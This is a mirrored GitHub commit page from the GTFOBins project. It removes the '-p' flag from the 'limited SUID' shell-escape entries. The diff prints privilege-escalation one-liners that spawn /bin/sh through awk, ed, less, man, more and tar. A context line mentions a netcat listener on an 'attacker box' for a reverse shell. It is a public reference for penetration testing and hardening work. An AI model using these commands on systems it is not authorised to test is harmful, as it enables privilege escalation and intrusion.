mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Remove the -p option from suid-limited
It is useless because: - if Debian-like, it is not supported and does not drop anyway; - otherwise the `system()`-like function already used a shell that dropped the privileges.
This commit is contained in:
parent
84f48081fb
commit
e885d4a6ee
@ -12,7 +12,7 @@ suid-enabled:
|
||||
|
||||
suid-limited:
|
||||
label: Limited SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems (if that's the case don't use the `-p` option).
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems.
|
||||
|
||||
sudo-enabled:
|
||||
label: Sudo
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
|
@ -11,5 +11,5 @@ functions:
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./ed
|
||||
!/bin/sh -p
|
||||
---
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -14,5 +14,5 @@ functions:
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./less /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -11,5 +11,5 @@ functions:
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./man man
|
||||
!/bin/sh -p
|
||||
---
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -11,5 +11,5 @@ functions:
|
||||
suid-limited:
|
||||
- code: |-
|
||||
TERM= ./more /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -5,5 +5,5 @@ functions:
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"
|
||||
---
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh"
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user